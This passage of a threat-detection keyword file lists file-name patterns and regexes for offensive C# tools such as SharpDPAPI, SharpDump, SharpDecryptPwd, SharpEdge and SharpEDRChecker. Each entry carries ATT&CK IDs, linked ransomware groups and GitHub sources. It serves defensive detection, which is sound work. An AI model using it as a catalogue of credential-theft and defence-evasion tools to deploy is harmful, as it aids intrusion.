T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18477" "*\SharpCOM.csproj*",".{0,1000}\\SharpCOM\.csproj.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","18478" "*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18479" "*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18480" "*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","18481" "*\SharpCOM.sln*",".{0,1000}\\SharpCOM\.sln.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","18482" "*\SharpCookieMonster.exe*",".{0,1000}\\SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18483" "*\SharpCookieMonster.exe*",".{0,1000}\\SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18484" "*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18485" "*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - 
TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18486" "*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18487" "*\SharpDecryptPwd.exe*",".{0,1000}\\SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18488" "*\SharpDecryptPwd.sln*",".{0,1000}\\SharpDecryptPwd\.sln.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","18489" "*\SharpDecryptPwd\*",".{0,1000}\\SharpDecryptPwd\\.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","18490" "*\SharpDecryptPwd2.exe*",".{0,1000}\\SharpDecryptPwd2\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18491" "*\SharpDecryptPwd-main*",".{0,1000}\\SharpDecryptPwd\-main.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","18492" "*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - 
T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18493" "*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18494" "*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18495" "*\SharpDirLister.exe*",".{0,1000}\\SharpDirLister\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18496" "*\SharpDomainSpraty\*",".{0,1000}\\SharpDomainSpraty\\.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","18497" "*\SharpDomainSpray.exe*",".{0,1000}\\SharpDomainSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - 
T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18498" "*\SharpDoor.cs*",".{0,1000}\\SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","18499" "*\SharpDoor.exe*",".{0,1000}\\SharpDoor\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18500" "*\SharpDoor.exe*",".{0,1000}\\SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - 
TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","18501" "*\SharpDPAPI.cna*",".{0,1000}\\SharpDPAPI\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18502" "*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18503" "*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18504" "*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18505" "*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18506" "*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18507" "*\SharpDPAPI.txt*",".{0,1000}\\SharpDPAPI\.txt.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18508" "*\SharpDPAPI\*",".{0,1000}\\SharpDPAPI\\.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","18509" "*\SharpDump.csproj*",".{0,1000}\\SharpDump\.csproj.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","18510" "*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18511" "*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18512" "*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18513" "*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","18514" "*\SharpEdge.csproj*",".{0,1000}\\SharpEdge\.csproj.{0,1000}","offensive_tool_keyword","SharpEdge","C# 
Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18515" "*\SharpEdge.exe*",".{0,1000}\\SharpEdge\.exe.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18516" "*\SharpEdge.sln*",".{0,1000}\\SharpEdge\.sln.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18517" "*\SharpEdge-master*",".{0,1000}\\SharpEdge\-master.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/rvrsh3ll/SharpEdge","1","0","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","18518" "*\SharpEDRChecker-*.zip*",".{0,1000}\\SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18519" "*\SharpEDRChecker.cs*",".{0,1000}\\SharpEDRChecker\.cs.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18520" "*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18521" "*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - 
TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18522" "*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18523" "*\SharpEDRChecker.sln*",".{0,1000}\\SharpEDRChecker\.sln.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","18524" "*\SharpEDRChecker\*",".{0,1000}\\SharpEDRChecker\\.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive 